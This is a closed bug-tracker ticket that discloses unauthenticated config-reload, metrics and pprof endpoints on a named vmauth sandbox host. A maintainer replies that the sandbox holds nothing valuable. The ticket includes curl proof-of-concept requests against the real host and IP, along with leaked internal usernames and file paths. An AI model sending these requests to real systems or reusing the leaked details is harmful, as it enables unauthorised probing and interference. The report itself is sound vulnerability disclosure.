- Status Closed
-
Assigned To
cbay - Private
Opened by hellofresh01 - 05.10.2026
Last edited by cbay - 05.10.2026
FS#519 - Unauthenticated vmauth administrative config reload and internal metrics/pprof exposure on sandbox-f
Summary
The host sandbox-fnonnenmacher2.paris1.alwaysdata.com runs vmauth v1.137.0, a VictoriaMetrics authentication proxy that protects an internal monitoring backend with HTTP Basic Auth. Multiple administrative and diagnostic paths are exempt from authentication.
Two are materially impactful:
/-/reload is unauthenticated and state-changing. An anonymous POST forces vmauth to re-read /etc/vmauth/config.yml, the file that defines authentication policy, users, tokens, and backend routing. The reload is proven by vmauth’s own reload counter advancing by exactly 1 per anonymous request.
/metrics is unauthenticated. It leaks internal service-account usernames, config paths, TLS certificate paths, version information, and runtime telemetry.
Sibling administrative endpoints such as /-/quit, /-/stop, /config, and /internal/flags correctly return 401. This is an ad-hoc exemption list, not an intended design.
Severity: Medium
CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N → 7.5
Escalation: Critical if any other primitive allows influencing /etc/vmauth/config.yml.
Affected asset:
Host: sandbox-fnonnenmacher2.paris1.alwaysdata.com
IP: 185.31.41.181
Service: vmauth v1.137.0
Steps to Reproduce / PoC
1. Confirm the authentication gate exists on the same host
bash
curl -sk -o /dev/null -w '%{http_code}\n' \
https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/
Expected:
text
401
This is the control: the root path is protected.
2. Confirm /metrics is exempt and leaks internal data
bash
curl -sk -o /dev/null -w '%{http_code}\n' \
https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics
Expected:
text
200
Leaked data:
bash
curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics \
| grep -E 'username=|auth.config|tlsCertFile|version='
Observed output includes:
text
vmauth_user_concurrent_requests_capacity{username="admin"} 1000
vmauth_user_concurrent_requests_capacity{username="aldjango"} 1000
vmauth_user_concurrent_requests_capacity{username="grafana"} 1000
vmauth_user_concurrent_requests_capacity{username="telegraf"} 1000
name="auth.config", value="/etc/vmauth/config.yml", is_set="true"
name="tlsCertFile", value="/etc/ssl/certs/alwaysdata.org.bundle.pem", is_set="true"
version="vmauth-20260227-182711-tags-v1.137.0-0-g2aecca1163"
short_version="v1.137.0"
These usernames are not otherwise obtainable without authentication.
3. Prove /-/reload is unauthenticated and state-changing
Baseline the reload counter:
bash
curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics \
| grep vmauth_config_last_reload_total
Example:
text
vmauth_config_last_reload_total 7
Send an anonymous reload request:
bash
curl -sk -X POST https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/-/reload Observed:
http
HTTP/1.1 200 OK
x-server-hostname: sandbox-fnonnenmacher2
content-length: 0
Re-read the counter:
bash
curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics \
| grep vmauth_config_last_reload_total
Observed:
text
vmauth_config_last_reload_total 8
Delta: 1
Repeat:
bash
curl -sk -X POST https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/-/reload curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/metrics \
| grep vmauth_config_last_reload_total
Observed:
text
vmauth_config_last_reload_total 9
Delta: 1
The counter advanced from 7 → 34 across repeated passes, always by exactly 1 per anonymous POST.
4. Control: sibling admin endpoint is correctly gated
bash
curl -sk -X POST https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/-/quit Observed:
http
HTTP/1.1 401 Unauthorized
Www-Authenticate: Basic realm="Restricted"
Counter delta: 0
This proves /-/reload is an omission, not a design where all admin routes are open.
5. Additional unauthenticated pprof exposure
bash
curl -sk https://sandbox-fnonnenmacher2.paris1.alwaysdata.com/debug/pprof/cmdline Observed:
text
/usr/bin/vmauth -envflag.enable
The full pprof surface is exposed, including:
/debug/pprof/
/debug/pprof/cmdline
/debug/pprof/heap?debug=1
/debug/pprof/allocs?debug=1
/debug/pprof/goroutine?debug=2
/debug/pprof/trace?seconds=1
Impact
1. Unauthenticated administrative action
An anonymous Internet client can force the authentication proxy to reload its configuration. /-/reload is an administrative operation and must not be triggerable without credentials.
2. Potential full authentication bypass if chained
/-/reload re-reads /etc/vmauth/config.yml. If any other bug, misconfiguration, deployment pipeline, or local file-write primitive allows influencing that file, this endpoint provides the unauthenticated trigger that makes vmauth adopt the attacker’s policy. That would convert a write-only primitive into full authentication bypass for the internal monitoring backend.
No such config-write primitive was found during this assessment, so the finding is not rated Critical on its own.
3. Internal information disclosure
/metrics and pprof leak:
Internal service-account names: admin, aldjango, grafana, telegraf
Configuration file path: /etc/vmauth/config.yml
TLS certificate path: /etc/ssl/certs/alwaysdata.org.bundle.pem
Exact vmauth version and Go runtime version
Process command line: /usr/bin/vmauth -envflag.enable
Heap, allocs, goroutine, mutex, and trace profiling data
Loading...
Available keyboard shortcuts
- Alt + ⇧ Shift + l Login Dialog / Logout
- Alt + ⇧ Shift + a Add new task
- Alt + ⇧ Shift + m My searches
- Alt + ⇧ Shift + t focus taskid search
Tasklist
- o open selected task
- j move cursor down
- k move cursor up
Task Details
- n Next task
- p Previous task
- Alt + ⇧ Shift + e ↵ Enter Edit this task
- Alt + ⇧ Shift + w watch task
- Alt + ⇧ Shift + y Close Task
Task Editing
- Alt + ⇧ Shift + s save task
Hello,
This is a sandbox instance, nothing is valuable here.
Kind regards,
Cyril